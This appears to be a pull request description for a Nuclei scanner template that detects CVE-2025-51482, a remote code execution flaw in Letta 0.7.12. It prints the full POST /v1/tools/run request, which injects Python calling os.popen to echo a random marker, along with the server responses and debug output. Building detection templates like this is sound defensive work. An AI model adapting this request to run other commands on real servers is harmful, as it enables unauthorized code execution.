Template / PR Information

• Added: CVE-2025-51482
• Claim: /claim #13745
• Motivation: Detects RCE in Letta 0.7.12 via POST /v1/tools/run where crafted tool source is executed by letta.server.rest_api.routers.v1.tools.run_tool_from_source.
• References:
  • https://www.gecko.security/blog/cve-2025-51482
  • Fixed unsanitized tool execution endpoint to avoid remote code execution letta-ai/letta#2630
  • https://github.com/Kai-One001/Letta-CVE-2025-51482-RCE
  • https://nvd.nist.gov/vuln/detail/CVE-2025-51482

Template Validation

• YES

• NO

• Template: http/cves/2025/CVE-2025-51482.yaml

• Verification approach: Executes a benign echo via provided Python tool source and matches the randomized marker in the JSON response on success. Includes a minimal json_schema to satisfy server validation.

Additional Details

• Verify:

  nuclei -t http/cves/2025/CVE-2025-51482.yaml -u http://127.0.0.1:8283 -debug -vv -duc > debug.txt
  

• Matched response data snippet (redacted)

  {
    "message_type": "tool_return_message",
    "status": "success",
    "tool_return": "34jGBtQJnZwGwp45es0f7zAeW5P\n",
    "stdout": [],
    "stderr": []
  }
  

• HTTP request excerpt

  POST /v1/tools/run HTTP/1.1
  Content-Type: application/json
  
  {
    "name": "nuclei",
    "args": {},
    "json_schema": {"type":"object","properties":{}},
    "source_code": "def nuclei():\n    import os\n    return os.popen('echo {{randstr}}').read()"
  }
  

• Nuclei debug highlights

  [letta-tools-run-rce] Letta Letta 0.7.12 - Remote Code Execution (@raghavarora14) [high]
  HTTP/1.1 200 OK
  Content-Type: application/json
  {"tool_return":"34jJTKisa9wTQ9l2arhBBiGHTYn\n","status":"success","stdout":[],"stderr":[]}
  [letta-tools-run-rce:status-1] [http] [high] http://127.0.0.1:8283/v1/tools/run
  [letta-tools-run-rce:word-2]   [http] [high] http://127.0.0.1:8283/v1/tools/run
  [letta-tools-run-rce:word-3]   [http] [high] http://127.0.0.1:8283/v1/tools/run
  

Detection Notes

• Matchers: HTTP 200; header contains application/json; body contains randomized marker.
• Behavior-based: No version checks; active server-side validation.
• Verified: metadata.verified: true set after local Docker validation.

Environment Notes

• Validated with Letta 0.7.12 in Docker (compose mailed).
• If server enforces schema, json_schema is included to pass validation.
• If auth is required, template can be extended with a token variable and Authorization header (not required here).

Contact for Validation Instance

• Reproducible Docker setup included (poc/letta-cve-2025-51482/).
• A temporary remote instance URL and time window will be shared privately with the PD team upon request for validation.

Additional References

• Nuclei Template Creation Guideline: https://nuclei.projectdiscovery.io/templating-guide/
• Unique Template Matchers: https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers
• Contribution Guideline: https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md
• PD-Community Discord server: https://discord.gg/projectdiscovery